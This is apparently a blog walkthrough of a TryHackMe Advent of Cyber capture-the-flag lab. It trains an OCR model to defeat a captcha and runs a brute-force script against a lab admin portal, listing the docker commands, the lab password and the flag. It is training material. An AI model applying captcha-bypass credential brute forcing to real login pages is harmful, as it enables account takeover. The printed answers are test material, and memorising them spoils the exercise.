TryHackMe – Advent of Cyber – Day 16

The challenge for Advent of Cyber Day 16 is super cool – using machine learning to defeat a captcha!

If you’ve been playing around with offensive security for any length of time, you know that generally encountering a captcha on a login page typically means that brute forcing will be difficult, if not impossible. Sometimes it’s still worth it to try manually entering credentials (for example if a known username has had their data breached, you can try variants on the breached password). However this will often take too much time and there are better things to try.

But what if we could use machine learning to defeat the captcha and brute force rapidly? The great thing about this method is that although it takes a long time to train the model, once it’s in place it can be used as a fast and reliable brute force assistant. It defeats the captcha so that we can again brute force using a large list of credentials.

I really liked this topic because it shows how useful machine learning can be in offensive security. Methods like these will only become more powerful and popular, and it will be a while before many companies catch up.

Advent of Cyber 2023 can be found at: https://tryhackme.com/room/adventofcyber2023

TryHackMe Advent of Cyber Day 16

Walkthrough for TryHackMe Advent of Cyber Day 16

About This Walkthrough/Disclaimer:

In this walkthrough I try to provide a unique perspective into the topics covered by the room. Sometimes I will also review a topic that isn’t covered in the TryHackMe room because I feel it may be a useful supplement.

I try to prevent spoilers by requiring a manual action (highlighting) to obtain all solutions. This way you can follow along without being handed the solution if you don’t want it. Always try to work as hard as you can through every problem and only use the solutions as a last resort.

Walkthrough for TryHackMe Advent of Cyber Day 16

Question 1

What key process of training a neural network is taken care of by using a CNN?

Answer (Highlight Below):

Feature extraction

Question 2

What is the name of the process used in the CNN to extract the features?

Answer (Highlight Below):

Convolution

Question 3

What is the name of the process used to reduce the features down?

Answer (Highlight Below):

Pooling

Question 4

What off-the-shelf CNN did we use to train a CAPTCHA-cracking OCR model?

Answer (Highlight Below):

Attention OCR

Question 5

What is the password that McGreedy set on the HQ Admin portal?

This is where the actual hands-on-keyboard challenge starts.

I started the AOCR docker container:

docker run -d -v /tmp/data:/tempdir/ aocr/full

Then I ran docker ps to get the container’s information:

docker ps

Next I connected to the container using the container id:

docker exec -it <CONTAINER_ID> /bin/bash

We can see the base64 encoded version of the captcha if we run ‘curl http://hqadmin.thm:8000/’ in a new terminal window (it won’t work from inside the docker container):

We can see the datasets in the labels directory:

Next I used aocr to train on the training.tfrecords dataset. This step isn’t necessary because the training has already been done, but I found it interesting to observe and learn about.

cd labels && aocr train training.tfrecords

Further down the output, we can see the training steps:

As discussed in TryHackMe’s description, ‘loss’ represents the prediction error; the lower the better (although the possibility for overtraining on a dataset is real). ‘Perplexity’ represents the uncertainty of the prediction; it starts above 1 and the goal is to get it down to 1 (again, overtraining is possible however).

Now we can begin testing:

aocr test testing.tfrecords

At this point, we have trained and tested our model so we can export it:

cd /ocr/ && cp -r model /tempdir/

Finally I killed the docker container using:

docker kill <container id>

Then I started a serving container using the OCR model that I exported:

docker run -t --rm -p 8501:8501 -v /tmp/data/model/exported-model:/models/ -e MODEL_NAME=ocr tensorflow/serving

Then I ran the brute force script:

cd ~/Desktop/bruteforcer && python3 bruteforce.py

After a few seconds, the script identified valid credentials!

Answer (Highlight Below):

ReallyNotGonnaGuessThis

Question 6

What is the value of the flag that you receive when you successfully authenticate to the HQ Admin portal?

To get the flag, all we need to do is visit http://hqadmin.thm:8000/ and login using the credentials that we just discovered.

Answer (Highlight Below):

THM{Captcha.Can’t.Hold.Me.Back}